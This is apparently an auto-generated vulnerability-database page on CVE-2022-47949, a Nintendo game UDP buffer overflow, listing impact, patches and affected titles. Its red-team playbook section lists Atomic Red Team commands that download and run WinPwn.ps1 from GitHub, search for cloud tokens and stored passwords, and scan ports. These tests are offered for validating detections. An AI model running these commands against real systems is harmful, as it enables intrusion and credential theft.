CVE-2022-47949
Overview
This vulnerability is a buffer overflow in the Nintendo NetworkBuffer class triggered by processing an excessively large UDP packet. The root cause lies in improper bounds checking when handling network data packets, leading to memory corruption. The flaw affects the network communication component used in multiple Nintendo game titles for session data exchange.
Vulnerability Description
The Nintendo NetworkBuffer class, as used in Animal Crossing: New Horizons before 2.0.6 and other products, allows remote attackers to execute arbitrary code via a large UDP packet that causes a buffer overflow, aka ENLBufferPwn. The victim must join a game session with the attacker. Other affected products include Mario Kart 7 before 1.2, Mario Kart 8, Mario Kart 8 Deluxe before 2.1.0, ARMS before 5.4.1, Splatoon, Splatoon 2 before 5.5.1, Splatoon 3 before late 2022, Super Mario Maker 2 before 3.0.2, and Nintendo Switch Sports before late 2022.
Impact
An unauthenticated remote attacker can execute arbitrary code on the victim's device by sending a specially crafted UDP packet during a multiplayer game session. The prerequisite is that the victim must join the attacker’s game session, which provides network access to the vulnerable buffer. Successful exploitation can lead to full compromise of the affected console, enabling control over game processes and potentially the underlying system. The CVSS vector indicates no privileges or user interaction is required beyond joining the session (AV:N/AC:L/PR:N/UI:N).
Solution
Nintendo has addressed this vulnerability by releasing patches for the affected games: Animal Crossing: New Horizons version 2.0.6, Mario Kart 7 version 1.2, Mario Kart 8 Deluxe version 2.1.0, ARMS version 5.4.1, Splatoon 2 version 5.5.1, Super Mario Maker 2 version 3.0.2, and updates for Splatoon 3 and Nintendo Switch Sports released in late 2022. Users should update their game software to these minimum versions to mitigate the issue. Detailed patch instructions and updates are available in the respective game update notes and the public repository at https://github.com/PabloMK7/ENLBufferPwn.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Nintendo NetworkBuffer class presents a significant risk due to its ability to facilitate remote code execution through a buffer overflow. This flaw is particularly concerning in popular gaming titles such as Animal Crossing: New Horizons and various iterations of the Mario Kart and Splatoon series. The underlying issue arises when the NetworkBuffer class processes oversized User Datagram Protocol (UDP) packets, leading to memory corruption. Attackers can exploit this by sending specially crafted large packets to a victim who has joined a game session, allowing them to overwrite critical memory locations and execute arbitrary code. The potential for such exploitation underscores the importance of robust input validation and memory management practices in software development.
Exploitation scenarios for this vulnerability are particularly alarming given the social nature of the affected games. For instance, an attacker could create a malicious game session and entice players to join, either through social engineering tactics or by leveraging in-game features. Once a player connects, the attacker can send the oversized UDP packets, triggering the buffer overflow and executing malicious code on the victim's device. This could lead to various malicious activities, including the installation of malware, data theft, or even the manipulation of in-game assets. The requirement for the victim to join the attacker's session adds a layer of complexity to the attack but does not diminish the potential for widespread exploitation, especially in a community-driven gaming environment.
The real-world impact of this vulnerability extends beyond individual players to the broader gaming ecosystem and Nintendo's reputation. Successful exploitation could compromise user accounts, leading to unauthorized purchases or the theft of personal information. Additionally, the integrity of the gaming experience is at stake; players may lose trust in the security of the platform, which could result in decreased user engagement and revenue loss for Nintendo. The business risks associated with this vulnerability are compounded by the potential for negative media coverage and the long-term effects on brand loyalty, particularly in a competitive market where consumer trust is paramount.
To effectively detect and mitigate this vulnerability, organizations and developers must implement a multi-faceted approach. First, rigorous testing and validation of input data should be conducted to prevent oversized packets from being processed. This includes implementing strict limits on packet sizes and employing robust error handling mechanisms. Additionally, monitoring network traffic for unusual patterns, such as an influx of oversized UDP packets, can help identify potential attack attempts in real-time. Regular software updates and patches are crucial in addressing known vulnerabilities, and users should be encouraged to keep their games up to date to benefit from the latest security enhancements.
In conclusion, the vulnerability within the Nintendo NetworkBuffer class highlights the critical need for secure coding practices and proactive security measures in the gaming industry. As gaming continues to evolve and become more interconnected, the potential attack surface expands, necessitating a comprehensive approach to cybersecurity. By prioritizing security in the development lifecycle and fostering a culture of awareness among users, the gaming community can better protect itself against emerging threats and maintain the integrity of its platforms.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nintendo | Animal Crossing\ | _new_horizons |
cpe:2.3:a:nintendo:animal_crossing\:_new_horizons:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Arms | All |
cpe:2.3:a:nintendo:arms:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Mario Kart 7 | All |
cpe:2.3:a:nintendo:mario_kart_7:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Mario Kart 8 | All |
cpe:2.3:a:nintendo:mario_kart_8:*:*:*:*:deluxe:*:*:*
|
|
|
Nintendo | Mario Kart 8 | N/A |
cpe:2.3:a:nintendo:mario_kart_8:-:*:*:*:-:*:*:*
|
|
|
Nintendo | Splatoon | All |
cpe:2.3:a:nintendo:splatoon:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Splatoon 2 | All |
cpe:2.3:a:nintendo:splatoon_2:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Splatoon 3 | All |
cpe:2.3:a:nintendo:splatoon_3:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Super Mario Maker 2 | All |
cpe:2.3:a:nintendo:super_mario_maker_2:*:*:*:*:*:*:*:*
|
|
|
Nintendo | Switch Sports | All |
cpe:2.3:a:nintendo:switch_sports:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-47949 |
| github.com |
GitHub CVE
|
https://github.com/PabloMK7/ENLBufferPwn |